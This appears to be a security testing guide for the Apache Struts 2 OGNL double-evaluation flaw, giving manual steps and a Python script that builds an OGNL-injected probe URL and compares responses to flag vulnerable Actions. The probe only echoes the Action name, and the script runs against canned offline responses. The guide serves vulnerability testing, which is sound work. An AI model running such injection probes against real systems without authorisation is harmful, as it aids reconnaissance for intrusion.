Testing for Apache Struts 2 OGNL vulnerability

Testing

  • Identify Actions (usually recognisable by a .action suffix) and fingerprint the response each Action returns. For the example URL http://www.example.com/app/Bar.action, the Action name is Bar.
  • For each Action, substitute the Action name for ACTION_NAME in the following URL-encoded expression: $%7B%23foo='ACTION_NAME',%23foo%7D (decoded: ${#foo='ACTION_NAME',#foo}). For example: $%7B%23foo='Bar',%23foo%7D.
  • Replace the Action name in the URL with the substituted expression. For example: http://www.example.com/app/$%7B%23foo='Bar',%23foo%7D.action.
  • If the Action is susceptible to this double-evaluation vector, the OGNL expression in the path is evaluated back to the Action name and the application should return the same page as before. If it is not vulnerable, the literal path is unknown and a 404 or some other page will probably be returned.
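As an added example (not part of the Coverity write-up or of Struts itself), the following Python script automates the four steps above: it derives the Action name from the URL, builds the probe URL in exactly the encoding shown, fetches both the original and the probe URL, and reports whether they render the same page. The target URLs, the canned server responses in FAKE_PAGES, the 0.9 body-similarity threshold and the User-Agent string are constructed for illustration; a baseline that itself returns an error status is reported as undecidable (None) rather than as a match, since a 404 matching a 404 proves nothing.

```python
import difflib
import urllib.error
import urllib.parse
import urllib.request

ACTION_SUFFIX = ".action"  # Struts default; a deployment may map a different suffix

# OGNL that evaluates to the Action name itself. Where the request path is
# evaluated as OGNL a second time, the container resolves ACTION_NAME.action and
# serves the original page; where it is not, the literal path is unknown (404).
PROBE_TEMPLATE = "${#foo='ACTION_NAME',#foo}"


def action_name(url, suffix=ACTION_SUFFIX):
    """Extract the Action name from a URL such as http://host/app/Bar.action."""
    last = urllib.parse.urlsplit(url).path.rsplit("/", 1)[-1]
    if not last.endswith(suffix) or last == suffix:
        raise ValueError("not a Struts Action URL: %s" % url)
    return last[: -len(suffix)]


def build_probe_url(url, suffix=ACTION_SUFFIX):
    """Replace the Action name in the URL path with the URL-encoded probe expression."""
    parts = urllib.parse.urlsplit(url)
    expr = PROBE_TEMPLATE.replace("ACTION_NAME", action_name(url, suffix))
    # Leave $ = , and ' literal, as in the write-up; percent-encode { } and #.
    encoded = urllib.parse.quote(expr, safe="$=,'")
    directory = parts.path.rsplit("/", 1)[0]
    return urllib.parse.urlunsplit(parts._replace(path=directory + "/" + encoded + suffix))


def fetch_http(url, timeout=10):
    """Live fetcher: returns (status, body). Only used when a real target is given."""
    req = urllib.request.Request(url, headers={"User-Agent": "struts-ognl-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def same_page(baseline, probe, threshold=0.9):
    """True when the probe response has the baseline's status and a near-identical body."""
    if baseline[0] != probe[0]:
        return False
    return difflib.SequenceMatcher(None, baseline[1], probe[1]).ratio() >= threshold


def check_action(url, fetch=fetch_http, threshold=0.9):
    """Fetch the Action and its probe URL and report whether they render the same page."""
    probe_url = build_probe_url(url)
    baseline, probed = fetch(url), fetch(probe_url)
    if baseline[0] >= 400:
        # An Action that does not render on its own gives no usable fingerprint.
        verdict = None
    else:
        verdict = same_page(baseline, probed, threshold)
    return {
        "action": action_name(url),
        "probe_url": probe_url,
        "baseline_status": baseline[0],
        "probe_status": probed[0],
        "likely_vulnerable": verdict,
    }


# Constructed responses standing in for a live server so the script runs offline.
# Bar behaves like a vulnerable Action (the probe renders the same page);
# Baz behaves like a patched one (the literal probe path is not a known Action).
FAKE_PAGES = {
    "http://www.example.com/app/Bar.action": (200, "<html><title>Bar</title><p>Welcome to Bar</p></html>"),
    "http://www.example.com/app/$%7B%23foo='Bar',%23foo%7D.action": (200, "<html><title>Bar</title><p>Welcome to Bar</p></html>"),
    "http://www.example.com/app/Baz.action": (200, "<html><title>Baz</title><p>Welcome to Baz</p></html>"),
}


def fake_fetch(url):
    """Offline fetcher over FAKE_PAGES; unknown paths get a 404 like a real container."""
    return FAKE_PAGES.get(url, (404, "<html><body>HTTP Status 404 - Not Found</body></html>"))


if __name__ == "__main__":
    for target in ("http://www.example.com/app/Bar.action", "http://www.example.com/app/Baz.action"):
        print(check_action(target, fetch=fake_fetch))
```

Against a real target, pass fetch_http (the default) instead of fake_fetch. The body comparison uses a similarity ratio rather than equality because dynamic pages carry timestamps, session tokens and CSRF nonces that differ between two otherwise identical renders; tune the threshold per application after looking at two plain fetches of the same Action.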


The steps above are taken directly from this post:

https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection

Another good resource:

http://struts.apache.org/docs/s2-015.html
